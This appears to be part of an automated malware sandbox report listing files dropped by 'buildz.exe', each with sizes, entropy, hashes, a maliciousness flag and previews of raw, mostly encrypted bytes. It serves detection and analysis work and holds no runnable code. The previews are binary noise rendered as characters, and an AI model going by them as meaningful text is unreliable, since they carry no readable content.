.d...".Y.....9F......q._.W..F..,d..z.8.J.I...8...U.....ouK.9.h..)}....i.^..z.7.1\._?.K.3....)^Q..6....8Y..%.sr".".)....Yf...D...2{.=.Tf.s'qr.......c...FO....".9.>.E..@......h..n..0L...a....z.~:E...5..p4..5..b..N.;..M......'s9.............U.*.SF...q...'...S...*.....o.0...Z...:PS.........T....aUR...d..6NLZ..$...bP..H...e.N.yx.r.....Z9.;......g..b1.H(.&Np{..z....{d..i..".Ab...:.W.E..ZR..b..'....7>.&C.........Y|.ji..@.T.z..%-+*(...Y....xei.)......H..Y.$I.y.%.4&jZ...{K..j5U.q...]+....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):118525
                        Entropy (8bit):7.998707141473872
                        Encrypted:true
                        SSDEEP:1536:4PdT2ceeZnOidieRBc19w7GyzbNYcyedCW7T+kUjMu81i56mSTBeo0zsTeosrCfp:+eeZDLRBc1DKtdN0uxmfdzNqtaaoA
                        MD5:EE507542314D14B4DF8F164C4C440DB9
                        SHA1:E517C302406A46DE614639F0A44710484EF98C1A
                        SHA-256:4FDD731DC8FF07C7BAB177F0B5147D6DCCE7475FA6B67B2217BF34D681DC8197
                        SHA-512:F77C7AF7C261CE5125394962E67856C01887997222068EA7F38623FC813DB3A11B86A71717C83E980C4174D1C630F0F563FB1D493BBF30A2EFABD672EEBCB253
                        Malicious:true
                        Preview:[{"Sy...GX$^E.Q...H..".P...g..|...N...8.Rzm...6..$"...:GQ..H......L...j.L...8!.I/k`l..q8...^..x..]Q.u..l.Z..o...y7w....9ZaY\..... |z.?.....hg.. v,......3i.$..k..0..=L...8...p...&>.CVQ..[z.Kk..J{..#r&.KT5{E.|.!.N<tR/....e.X.....9a.=........v.]....%.}.......(..E..)r..4ID. ....}b@..k.r.D.......B...]....R...Q...... ..S..Qd.1..... .....L......Z..+(..^./.&.9........V...{RI5.G.c;.@o...]rk.!.._...B.w.p4\...6;~..3...$S/.}..m].O.....W.<l%LH..".@E..W.;.n^}.V...j4...U.n.......r..tY-.8..5.i.....].....!D?L.E.......4..]...&.~.......\....j8.xh=.Xu.......t}.CI....;.cA.]4?9T...)........W.........du~........<.....]w.f4Tq.ss..7.. [.5E.....+....a"5Y..~..........+x.`.......Q.'..x...RnR...o..u.p.S..-......,.%..6%.].....U>...^..1.{.0.m.H.|3I...b.+.w.k6..K....L.l.K..E+.....Ta2.c..9.T.u.... ..SAM..>..*.K..;.%...V..yn.....}.^...i=.1..'..B+8.:...'.....*.au.g...I....!...Q.... .Y,..x.[t.-..g..`..-#...TZ<.e..r..&. ..-.D.7.?..|d..se.K....S.7Z..y...^....C.}F.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):118751
                        Entropy (8bit):7.998307929994479
                        Encrypted:true
                        SSDEEP:3072:vNnF5eJrglQIFR/uA47pX4uGFw1ED+M6TddJK4xA:xeJrgqIS1pIuSjDtudJK4m
                        MD5:EB259CE4AF66893E558A686C0F46B22A
                        SHA1:4C000B43198D45D6B6CEAD850DE412C5DB9B386E
                        SHA-256:AF143E57B18BABB9206690186A0E5E5F49D0A16BE4772639FF80E00FCC6BE406
                        SHA-512:74DAAC1832534FE642855E231590153A477EC5DBC3BBB01A136EBDB9EA5FDC1F7D182A0B7712B6C164D08C881712CAB931161B774A17ABA28827DFE64FB1D57D
                        Malicious:true
                        Preview:[{"Sy...w<..aW.x...2.~.........../.c..Ba.O.y..*.M.b......kj..?..kI..9.j...'...S.e>..$.#8...O;.]m..h<z.v.}..."b.El.....>H'L..e..O..!....8..U..8u{......'U......G...m.$.zh.t.@...'~. .."H.e.....=0[S..o..M.}....m.%..!..w...Q./.......%...r$.~.z*..K.1..g..0...?.......;|x.....j,p#}w...lp.|=.w.B..S...;..J:.V.kHN.......\N.~s.J.93IP..p...Q..o`..H.r}H.&x...x.g1.7.yq...,.V..A....4.z.0....X..J...............#..-z.h....q_).h..dS.w1<.JQ....z...*...cH.?....M...~......{......{.$......xL[.IE/,-.{./..!....<."._...|..Qs#.a7k(v....@G&!..IS...R...4..M/.54.H.T...'..h..T....|..T....V.2./r...^2.u..6<...U..m.n.][X&....}.W-H...{.8@.\..9....t(.Ee;.<.mh...hn%.qO UO.s.}P........c.v....|....nv+o=.....y.j9..rd.:bAH4U....s..%g?C...'.DQ....me.G.@^.e...K.x.jjC(....>........h3.m..%a..C[..<.u._-.Z......gV...@61....R....}h.W....2.g....G.o....'..9..:Q.~9..+F...*..p..\~........wo..C..O..8.)x.T\.I......j......W.Cy..a.Tn...>.:.G...XAy7U^).>..f...^.0~.2...i........2A...3...!.J..K.u.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):117150
                        Entropy (8bit):7.998678526110674
                        Encrypted:true
                        SSDEEP:3072:3Ft8OFVHj2C+snQXchcKhaNnFzHlrr6UyFgllzlx+uhc+qn3WA:1t88dxUcheN9Hpr6bqNjS7v
                        MD5:05243E2042E74993572FE2ABD3159883
                        SHA1:3BC281F797A21D89353FDE79BC7CFC8C9E8EB134
                        SHA-256:DC04708667564D90814056E47A26539DD3C5EEA1428BC4F0C3B7E0C5E8E8D5EF
                        SHA-512:7313870A2D321AF3D8CAA304A0ED7F5C90F67EB7F539936F5655F0E22BD8BB88408E34D1C5790C2E9DB8595A75CE2BC56F9CFD8FA125095412F938D9AC738089
                        Malicious:true
                        Preview:[{"Sy..+.:.....k..G9...G5..8..........eSo.Q...i...K..U..%..O>.n......E.g0]........>.r.....#t.'...S$":<.k........U.Bl...I..w2+../avI........&2..j.0yt?.`.7..\.JCN4g.Jdw.Zi.|...C..I..O.....*`.j...\..J2.......#a.ngP.......b].z..S.|......o.a~....\:P.p..}...MW.W;L.S.S.*...$......&...wki...0+......eTA).....N.......Q.9...$.H....^..@..f:.d..<*.b...=..l..n.%N]c..p.,.w.~...:..m.RI.z0m..Y......i....;.....?..q .\k.<4..."D.V$...(.{..ci..I$Qa.-......0...3!.|l..y.......m...b.....t .~.....d..9l..Q._n...{...~..I..7. .tu......g...{.O6.*..C...6..i.[...z!(.9..h>....].|.H.V3....F.."....n.@S.E*{\a...........[.o..4W._........%.H.f@.$%"m..b!0.t..F.zOV.3.i. .C..I.....-A......2.fE.C=..2xc..Q.88.~f..^C.7<...A#.F.dN..\...R.....jZ.......yc.m.!L.................f..^[....z.%".tw.uF....o.|.....T..,A.#...:....U<......B.E..b.4...k2....h..!..l..N_.....4\...B....I...{._....F...*.D..HT1_.I.qUT8..\.+`r.....&a...hBk..C..k....X.....&l.xJh...M..kF.]._.......U7E=7.y.&\....Y#.^;..?.T
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):115176
                        Entropy (8bit):7.998513259425216
                        Encrypted:true
                        SSDEEP:3072:9Ksf7cksj4tV3eUuX0qzjuYOs8ydRGtxVa3EmleDdmXA:9Ksf7ustV3huXCYOTvla0mbQ
                        MD5:7595A8F303AC9303699ED85AB2A51CA2
                        SHA1:82079803F7FAE16940E0B256C6CA64D19146DAB4
                        SHA-256:B38389406CB18C87511E0444432FA75347F97F8C04CF6D4D954CFA5490AA39C9
                        SHA-512:477D23F0FAB4C26EBC15775ED711FE1DF766841323387A844622B21AB0ECF903942C55F4E0B51E45B61ADAAD0E76E6BC5C41D19CDF79B98F7592149E22F363DA
                        Malicious:true
                        Preview:[{"Sy...`.."..j\..<.Y.qtW.g.o..O/..S8....5Q..,........L...;...#....p.F...Z.Br.....w._.7.e......8........p...1^.f..l.}.]..|.-.:}.k.. ..74o.5..o..9.)....[...`a4.!.*-t...{<........j...sHf..#.../Cwt..]).........V..[.lHm..;.$...!....p.hJ.(r.*.Zs5c.a.t...]...w.o....3}....& ...5.!..)..1E .h...T.iSyI"._......./.9.y:y......5...L......Ie.!S..o^(.........1\.,.8..=S ...5k*3.s\.2!....%.A...R.7L.@.*.|.u1~mQ.t.,...1._...J,]g....[.R.....y.Y.$..\..].4:....8..D.*T....z..@.`$.\..g0I~...{7bL..A.F....9......Q.S...r...~+.....Y...0|.Rhr(9..n!....e...T4..K<5"......T.H.r. ...N<6.y.C.L......Z.+o^p.0N..Z:=......+...l..b..#.....r.F,.x..f.X..RW...x...._.o.mo._..q.....!M6pT.\...v..S.ly.Rz......b...>....Q..V.."D.8........2Xj.....D..?.?..&.V..]...Q..u...K!=.&P....3..X.S1..S.l.p...-..Y6...D.o...9...h..]k.la ..........u.@...by.3..rB5.e%.n.ah..'gP\{.W...@+.....sse"t"G..\.."......\.R.............$....K..>U...K*r&./o.r...\.~............a.o#........v.p...Ez.....<5.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):115177
                        Entropy (8bit):7.998284119581346
                        Encrypted:true
                        SSDEEP:3072:4WC7Mlq5/chHIG7gepuQTmKo++DHMYD2AQM7+O5k+iuAIA:4dBUhHFXpBro++TbnQM7w+iJ
                        MD5:DE828E1401442AF7A39AF42BAF73EE10
                        SHA1:B7930E38BFD760A918BD4634BFA3F6A8CF75FE9B
                        SHA-256:983BA9A646F3F7185D7D39FDB745CBA2D02D79D7882D87C7D73204C929882426
                        SHA-512:5CBAE44748F9E148BD7ED94DB7271CEB309C2C7C068A5AC50C986B9C1582B41FFE0F756F6CDE3FD33C087D4EAB80AC5E1586945FC7A4F49DF6DACBA369D272F5
                        Malicious:true
                        Preview:[{"Sy....../r...c..5n.&;".v..#.....f....SHB..S.G.7X.;.l.b..o..........[...I.Y..piC.WG<..Wh.H.......m...W.#......G...v...u9......g..O.g..g.u...t/M..1.U...(&L...#8*.J..J.e\...DM!...`.:.o7-....=..i..(M......h&..kKCfa.O!.lj....6J...Zmy{o.....wvN.-..g.7S.U..kj...A..{..U......a|.@..]...*....^!....Y1.gf,7&...."j....e......6..V.sz..N..G...`........k.p.C@4.....4...........2.RylW#.v2i`9.}..W.Fu..4.y..q...h.6...<,.<.'V.J.qw,.G.....c$..B.q2F........AR....V9^....=.w....|.v..1.k=k.I..-......d.`...zQ8me0...>...(*.J;....b../~....4..9.MV......}..:..WT.MG..).P>.P.C..g.p.d....}..tm.a.Y..e.w~@..&m$..D.....g..sT._z...(......-.4..x].-....y.!6..V..%-............{....s..s0..8...al....Y..O...nJ..z..X~pF...d........0...`../-O.g.....Q..4..E..8t.,.U..ek:..../O,.Vv..i)...`..Z...W...UJd.z..[R...kKi-.\.5.J.xo.*../........{M.....J".)4"y?.\.R.Y.r S`S4.4$yspkhE..{kv!...&z...n.[dW.pjk..`v...........Ft..<..9...$....YR|..\].X..g.OIsQg...a.t.p...V..:<..P.K.45..,=
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):115177
                        Entropy (8bit):7.9985512610346
                        Encrypted:true
                        SSDEEP:3072:i+pSH92qOLHtjsc3XndMWquHMC1WPK0omordhsmA:Dpy4pjtjRXndMWquHM00YE
                        MD5:EAB79E6C62369890D6DF1A0B2AC578CA
                        SHA1:511ACF79E2A0FE231C686DFBF8E76ADD0F08F630
                        SHA-256:0A5006D708C8FCEF9616224691F8128BEA114524EA1C0F99A01A817736DDCDE9
                        SHA-512:8FD34D32738AB9EF8AB672840A84103B30DA7996AB9C04F8D22E50FEEACB79A8A2F753B84C6F917730844889CA13B2D29EAC929B93D70C57027C1EF50395ACDC
                        Malicious:true
                        Preview:[{"Sy..t.?<.w...9<.U..Qd(}.F.C...{...C.........b..p.Q....`t.G.>&..r..F.. Q6V_....o...yk...w....S...*C.k.n....Fc.2D.W=T..=5.h.9x{".X.......>....@...G..`..3...n...eQ..._.....?..\.{....Z..S.X....'.6..u:qt..%V..-.>5....Q0.*=.<.+..Q ..:S...`'/....r}...I......C...8W.='5..%..@ .i.0..I..y.....c..YR94f..[s.j.%..u.....W.o.9....(....='?3rDl...6.[..c..d..?..(s...U..&.d&.5..eEb.H..~.FyS*:.az...'...q...P:....&~y.Z3..t.A........z#.......J...5.T.......N.N?.`....8......}.......\..'M..%...^A....d!.....)..S.....w..n...j...bc.A.W.2.@I..?.q..O.6...>.E...8[....C.K.'..8..p?O.q.T..'...w....rPr../..)/...Fy ...EB.....d.byEd.....q.v]...L....T....8..0.C#.......2....<\..K.e.y)\...U...r..p..&.O............oYC...5V?9O...cF.Ng1...z..wE.c_..QR...>X..ugm..........,#[7..3gV....Fia..7..|({slk.L....\KDE...%..g...8Qb.....u..@y;.6.@,.5.........Y...~21..!.fo\lA.@...p....{..E...........S..o......`...4.fr/.e.S?0.R9Y........x..n..i.._.z. :..P.....Z..-..F..fz..Yd.8.beu....w....WB
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):114335
                        Entropy (8bit):7.998375249755898
                        Encrypted:true
                        SSDEEP:3072:X2OAZnlm0J+q/C7vubDZDGVEgtIfW6LLbFd+fHWvA:SFYpq/C7OZDGVLx8F4fHW4
                        MD5:1D783814828480EF125DF25E8E22D395
                        SHA1:4C071EBD15CD8A380DA33D1B77FE65C55594C902
                        SHA-256:44CAAFEBAE09F4F6DA807FDFF8403454FE2E84A186C8990BF0EB2E7852C78962
                        SHA-512:DC4CA561AA7091F998DCDAC25A3E7981D9CDD0FB9C9EA9B310437DB4333B907F044E0B3A86CDF3D862D34ABC5879B00B9008119C35603E28ACD98533ADE8DAAB
                        Malicious:true
                        Preview:[{"SyXQ....).=........Q.w......=Q...F.q80uJM;`.*.$...Hv.t.N...(.8.8..x.F.6..e.y..i:.y.0..'.y=d.e....c.....`tS.~.N...(..h....7E......ps..X.Y...g.3K.xp!.2.K...L........-...Gy.....6..8.....H!p...|.t....g....w;.d..w..D...M...01.'..f.42..mHS.q.`..+N.u.).'U.jL......M_3^9F.N..C...}M..c..).......}m..P..Nw....i.l..H.O._J.q.u..e..w.q...".....g..GJ....s4~..o1.%'..e7..ML..~h....."....3.".._.\.......p.......E..['....l.r....Q%...-..k'....O.Z.{..Q..@..i.,..k....Bi%=....3./.\D.d..4<.m..Z..aX3..<...gF.i.1...Q!......J..D.\,....{.aZ.......Z......C..{.@w.....=e5yY.e4..m@...dZ.;.._...MN.._C..|..........mZD.......'.G.R.....x......<.L.!.?.w..M..B}...&k....<...e....+. .......P...pf......8.=.%..4....5..H......m.../.9.f1B.).Y.,.B...[...D].2..........X.*...pI......M.+....5.....3.......x/.....Tp.a)..._.X....W...Z..?th.B.21.....#K...2...8..fd.1O>!..l.+....2..-..H..o.....s*5...c...8.t.9W.8..?....S.......K}.&...w+.....RS.....C.B.?"A6...>..A..^.:.%Y.}..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):114335
                        Entropy (8bit):7.998360791401127
                        Encrypted:true
                        SSDEEP:3072:bVG899x455P1cW1OeVa0namMaZB6fGReptxVA:ql1d40na6lReFS
                        MD5:D94EE1FE91BB205A2F59D3850D1C7D93
                        SHA1:477583E8550A4BB01A6EAFE28DE21A8EF285F44E
                        SHA-256:4CAC3CD0FB7B821259F96A02420A83966A2901C24010C8F23F2B34FDF8F4ED92
                        SHA-512:DD1C96D9ECAB0EC907D7452B3BF7A82B5CF8E266ECF7DF33D3E857E064B00AB78F46C1FF3576425025EB13378C990FB373CCD4D25F86A212C9CD6B468CEE5471
                        Malicious:true
                        Preview:[{"Sy.......;3D..!..F.R...O.~$..Fm..aW>..^../).V...v@.S.r.R...@....!.d.y.TF..p(.40.m..a.M.Rco.~.2.H..p%H&..._.df_..{...Hh.....+.....X{TD....}...,Z..&..(.d..S#6.....}EF6...9.....5A$.<.q..8...$...'Z......>T.....a.BZ........[...p...9....B..6=....k4.+....S./v.u..H.9?...j..%? 1....z..a.{.......C..4.y...../.o.G.m.\.!m.8.CMP.-.mv<..U.':....cE|..u...3...n...@....B..*.Cc...x&.".T.#.#.H...qD......J^D...$q..j...7Z......CL.7.......V........`.L;_Y.......^l.@.]Y....Z;.[.?j~I.c.4.Y(..e:..l...(.b...C.f.n....'.(uN..0.X....7....5#`.r....`.....8.....[n(;.$...M.#Yb.[.Yx.9z...z)....l8Z.L.x....k........~[.B.i..P..ea..H.su0-......F..Z..D).}......z...T.O..mkb.=..4<..d..|R#....P.6..V.8.LH;.......6.."l..A...~.U.4o.).b...A..8Z[cW.7..^.3L.#......1.....J...zp....c.G.x8Q..QW...........9.q.=.Wx9...B~?p...Q..#p!.".9L?b.....Ock..&..q.JE:.L>./..7.....g.h-...4FG..n.\..?..S.w.M.-...4...1......U...?......0o.ny..eJ.......V...*....Q.h{.w?`..JE3ZF9a..'...Q.k6n..E...~.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):696930
                        Entropy (8bit):6.209999179926667
                        Encrypted:false
                        SSDEEP:12288:wWNDlDwaJBNoGotdYuMOCc5MpzgroTDLgl:ZDlT51uMOCc5MpzgroTDLU
                        MD5:A4B17FCFD22DA636403558A21BC8DA3B
                        SHA1:96946F3D3B622CB0008D2A9E81916D82CCE85E7A
                        SHA-256:8DCC2ECD56162988CBFD491E772D8B78CF4034EA0F06BF6BE0BDE6019353A159
                        SHA-512:A0293ED09F819354C679FA4BB998E47254451E5B74D7812B6B7CB5A14E7E3BE0F55762EACF7024C2823B93794DB987FF7ACCFFE617AB1F85213969F8059564C7
                        Malicious:true
                        Preview:[{"Sy...."pQe......^..c.m..V...A:1.0=<...c.^+o.....{.$.....A.e5o..~T...".....3...P.T....2....u..(.~....X.f.M...L.."..k........yq....GX*....|........|.../..P...4zT.X........q.L....z........r..l.,..t<.{...q.....).&1|...N..../...6..]7.l...y.x.<..z#Af..Js....<.3hD%..ni..I......7=B.2....{..J>BW..Y...S..w....u...L7Dy}.L*...P.........Y^.......l.MQ..b.hW".5/Z=.F.k..~.\..}...|.r.T.PYu.\4.8.....4........V..`g.C.B.=......c)..+..n.\..vn...(....8.s.v..{......*.o..%7*........B....A@St.........q.y.?..S.u....4...D..8...b.J....O)sxu....o.....xd.L{j U.Q.L.nQ.....7S3Q.x.[.o.d.I.J...:.o..U.4F5.x..h.....>8.....J....*O......nZl........1.g.y...d}..!...l....7...$Md..'.....4....".......V.Y.j....Z.....Y.L..o..}R..K_.0.._....J.....$.B.5.).....<.k...J.I../..k..;.Rf^.o...aO......:.......g..#p..+S.\}.P...t..k.>.m.%g.C...$..H..lR.....rE.+d......Z....~.c....d.....d...........]....)Z..!..R......T....|.6./.3.)..._j....H..P....(.....p3M.t..:.'.#J...*Y.iD.f......R=e...R........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):615
                        Entropy (8bit):7.59256592813547
                        Encrypted:false
                        SSDEEP:12:q6km6ar0O1ZSA3Gi4Afp/bShatEm/Pl2jY7AuLy2uiKyTxnuz/26Gcii9a:qE6a4OqAWM5bShatEk2Fsyk1uzHGbD
                        MD5:03E58752B81491E4AF87594301168A8B
                        SHA1:F1D9F9B352A311863BD8B359BD4A1971AE3C81BA
                        SHA-256:57C3800BDD4038CD1862ADFD2FFE4A521B26DBCABD6BF33F1EE2395D0F3FB90F
                        SHA-512:F438A3E8AC52F655B4AD0764E28B4218C0DA2E11CDCA78F7A6B9722D76E8893854138B7E48ECCD1017935E2943FD4C6B508719C091F7D05F0BA8DD9D056F660B
                        Malicious:false
                        Preview:[000:....|.!q.....h`..7L.i...4})..`.7A....r.F...=.EP..S..../....5d. ....F.v.=..@.....NB..U.tK..1.)A^..K9..{..k.%.B..).....>...:9.!..?.....):2.Q7....1.-anf$7..J....D.".......X..<......@..a.}.......s.....GE(.._... .....mq....E.,......0.c..E.US;..qS#&P.....X@C{=*...U..>;.!...+?......o(..5e.v\.9[S[j.9.e.....z.....7zcw`.VolIT...]A2...3.}...+..A....[*.ep. ....Z...".8.&..+B...~..~Z....>..j.`czZ.g.HR.wN..,...Fe..'.kIn...dn..T!..jA..D..64.u.#,q.e....r/.88..pQf..N.[G905.#.DS*..S..GH.W9.Ai.......]|/-.pQ........3..9..NJEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8547662
                        Entropy (8bit):5.20515744317726
                        Encrypted:false
                        SSDEEP:49152:a8uq38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOb:aFcF1qd/LKNb
                        MD5:0B36D3FB7334908786C2995D3C2A7AF8
                        SHA1:B9F41138E7B1E2F2522548F22AC04E1B22DF327D
                        SHA-256:047C0D5174B91947D81C2FB888944533FF123C2D5C2F093C0CEC9FA5189D7826
                        SHA-512:6619ABD0ECE1C5D721FDDB0043226FADEE4C5874E6B147548288B1E09B15D949F1219D68FA661C9A9875A1B727AF6AE06C99A68A2CEBE5A9F1580B14C5ED5BD2
                        Malicious:false
                        Preview:Micro.N.......*!...].........a..+.;.\:.?..7_;..q$...r..7u.;...C../iq.$le.v^....'.....<7.h........?[.vi.......8...>".......&#...E.@.........f.kD.....p...Y<H..8>.B.5}+*..W...qP...;.../..=..*t........2.@....q..*~..cm...Z%.X.R....lV..c]K....{.....).....m...eS..q.+5.Y.K.+..g.8.A..G......k..\..]O8...n...K.bO...O.zx.t..s@.W....=..q...y..s+rH.T$....Z.1..v.#...'...E@..Q....... ]e.%.t\o.Sn.w....q)..0..i6..ET}.%.+.%*b..6${...6.Wq....h8d......;sHF..~....!~....*..b...hk.]....W.L.xs...".....V.............U..].W:2...r.!.........a....*.xr.@?.mR....[`..$`.b...D........Fv|...u.wP...2.aj...e.S...'..B.<.."....D.....4.t}.%.}...].O....1X..N ..~.R..G..g....%.4..+.9&..E....J..$....,...U.H... .A.r..c......V..Gh.c*..|...$`d[.Q..]....i.]..^.a..F;.p.1'.....%..c...z......R.e((.-.,...Q:.._.,;...0.9...kKD....._.$..:.z..d.|H;...w0!.=..b..B.....F.bsA..D.`..}....Q.Q.m#,..8.=..50a5B........m.."M..6:.*.5.....F.CLu$.e.2Ay......*e..^M{..p.....cL.[[&..J...9=...18..G3.6
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8547662
                        Entropy (8bit):5.205060039828455
                        Encrypted:false
                        SSDEEP:49152:LDC38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOs:LYF1qd/LKNs
                        MD5:850AA27B13085AD577CD43B8991A7929
                        SHA1:23EAE4B3A09F2CFEF2A1714F27852CFFF56B6BD4
                        SHA-256:C0C1F3217B81681E59FCA32B5BB1B36DE9841D272817C82CF642C81F0CA40616
                        SHA-512:0934864CA594815C226B45FF59D6A9DB47F39D85464F578404663FEA7EEA2CEEE19D77F232A30D8745FDFC5A61C4309FEE0DF3D5F757153AED9860A201821B46
                        Malicious:false
                        Preview:Micro..../....[.............\I$..np.q...Do.....Q.../......lG..)U=.-2..........jJ..a...c..Xg..v.....0..."Qq.'wlN..d....#Q....#...M.DL..&dm...6.+..S.x.X.b&...)...=..-9..O....S#..A......}..#`........qx.T.]l+.!.?N.oA6....Cxw..&?w..OJ....#..I.>....-.e.!.a(.7|....`..<R.7....J..*.4.4)c..*].D".8......=...^.?...$4.K...k[.....S.JI3..0Y...n5..C..]._5f....."6..{gZ.6k.ddF..Q~...:...2..Go|I'.......t...4...D..>....'.k.n?7...\xA..]_.....#.Dl...<.. .s....$...6..(...G .X...h$O.N.n....M......>....}...ZY..f..x..|5.^..U@.p.k....z`.Y.3..v..Z._."..V..&.rx..Q...~I....E.....P..../....n.....m:e.c.~..>T...gn..U.\.q..v~....~....3$.?.G!.N6...?.ePA...V....)t..T%..v.uo~k.U...lDI...e.17*1D....Gl.9.QJ*....W..W...../h.R;..P..@.un5n!.E.3k8s/..M.I8...o..T.W.....k..t..`7C.]...W.#tG...W.S...9\...&".J..X.`2%........!..,.K A:...A.v;.p.eeo.....**...Jbb..U..d%.i%kO...7.....i.....,p..........s"......7...5L.'0a.4.m.x.../`.f'?.....2!{..Q...G4:..S..tD2.# @5..R....'L\rw......dv...wp/..]C......2
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192270
                        Entropy (8bit):5.663129351425854
                        Encrypted:false
                        SSDEEP:12288:Jhr1F5ivqwFe3FawOVQYerJQ4aKVmaS4aMz8Pg3lxJo2cvXtg:J1BiwVrOKpBaKVzaYcAqtg
                        MD5:0F20ADBADF9EFE36511107824B218C29
                        SHA1:3E7EC7DACEF69CE5210CCC0FE9825D12414F9030
                        SHA-256:2899029A6C85D884569F3D6381D680EDA4A6910BB99A443F33C44844B0DB9BFB
                        SHA-512:6EE41675F026A61379B4DBD68B49AFF30801E90FC67AA165A7689492AC8DD047322BAE4FEF67B066CE3DCA7CF6DBE77040713BB12BCE982F2B63CF55B1BF37D3
                        Malicious:false
                        Preview:Micro.}R.......<....f..H.%....O.V$.).=....G0.....V]{...3..L...L..:..+.>.M...`.....q.H..#E.....5.........,#e.5..C...p.8Z..I.7.N.j.7.Y.....Y..~...|...YH.'...........X.x?......YVtA]S.......8('%S/...l.-w;i. ...J.(.......TO... .<3.'6..l7..p.5..Y.\=....**.....>]8..\..1...d&?....=3...=.ReW...[....+......E+.....O.Vq@+O@"C9I.....X..+.wJ.......ZY..".....\(.T=]0.8.].].I&3...{#\.}....H.):.......z.H...%.....k@4.M}5 ...*....A......J\....Z.|.a-......k@2.Y...O...L.W(.]..-'....V...iy..Mp....}.........VH.G.7E.....M..I.?e......U.PPC..3.3:.....j0...h......{.7...i...XR.......`.>*...S.N..l.....S.p..'....<...]/F.D.p..K.I..%..@..6.h.@..f7..%#..'........5oe.3Y..k...&^W..!u.7V...E@.<.|.n..YP!..y..; '[!m.Q..D.D_9.].MY...P;(...k..8.cmcB...2....E.....T.9...X$.P"S:..j9PbL.DD.v..Qi.@[.C+..F. ...vE....b.$..E(^;f@.zV....8.}.p(L.KQ.......T.h,..1....J+cr.....u68..w....7.m..h.....k..\.".~..^.C......rE.....6_.v.f|@.......|e.hw....yy;=....._p.u...P.#U9.1.}.%..,y.q.oC1.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192270
                        Entropy (8bit):5.663575349786916
                        Encrypted:false
                        SSDEEP:12288:/rqccpSZdcdFJQ4aKVmaS4aMz8Pg3lxJo2cvXtT:/NUXBaKVzaYcAqtT
                        MD5:1A257DC5450006F4B27176CE9F351A99
                        SHA1:A21D46798A10FBCE076C4DA5DE2E9CD0047F0314
                        SHA-256:C30481F08A023B7B86741E2ECF98F66E07A6CD258A8F2239746D8F4B184AD9D7
                        SHA-512:C12D8FBFE6424B71DA2DFFCE428FB561AA47C229F54EC513CDD136B278338A8BCB09AA290D1C03FCE5AB7FDCD696D70A9C70027986A8BEF894D704E8EEC00EF7
                        Malicious:false
                        Preview:Micro.|J..[H..6.\@...l.....a$+p..]R...O.yN.8X...MSe_.<.%...M.-~..@.......S..G=RTug.v.+..uU....?...,...g.)wG...S."1..iV..!......a.....K..*p......c...6.S.\d........K[.&gxiR:.{.|U..y..4):>..}.f+....<..9m.<.. H.yRo..y\..8.(.2.x.@.d.~.{.#[X.N.P...~$....+....n3.4..W..-.....g.t..O...:.sB...x.3"..1._.....J/..!..V.U.4....q.<.v....9.r.x..h.`).~k..h.:j...@.1C.J.3.... .+!l..]3......d.W..a.G.^.5........S.....s....&.:....6...f.{......`W.JE.o\.......L...eq......O.1....U..x....+......=../U..".b3.c$^M.CO..46..7.18.=..`.!.L....7.2..A...D^g.X....T#..-.].i..y..6SCe.L.E'.d....A.*..T........4..P...:w.U.....R...W.....r.V.z...V...q...}AvW.....`......8..@.,.....eE..}&.d....1.u*...MWl.....s.4$..n`.....d....,......5|....L...p.0.......X_..w.......%....._wx.W.\.j.e....%.......g.K....$.._..k...3..;(....`o....~<..d...Q8...ms../......i#H....u....Y.F....2....1dv....G..V.....^'v......s.!....nc.9.L.z<.E j.J.K.....8.Ei...U...dp....3.6g-.x".'..ltD.z.".;.9...e.F...mB..0...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):897
                        Entropy (8bit):7.796037501320161
                        Encrypted:false
                        SSDEEP:24:Y07mEvs6mObMjkfPYX51JcLfyui71J7FwkX1C7Kd0GbD:YkmAs6mOoj4PYX51afgJJjXoFUD
                        MD5:6ABF4919B575A6FFCB348B0B66E4776E
                        SHA1:5255DFD46C536A99E9FEABA6F3F3A1EA7B74E20E
                        SHA-256:6531D55C9459A6986F984618CA0CB17FA68FC33EB340E9D855E864E83952DAE2
                        SHA-512:F45533A1035AAFE3743C38FD9CA14A32EFC88706B9DCF8492AA4AF26FC21BDC81181A5072AFE26C97F486C42DCC3E1876173FDC7A289FE17F5955FD6508170D7
                        Malicious:false
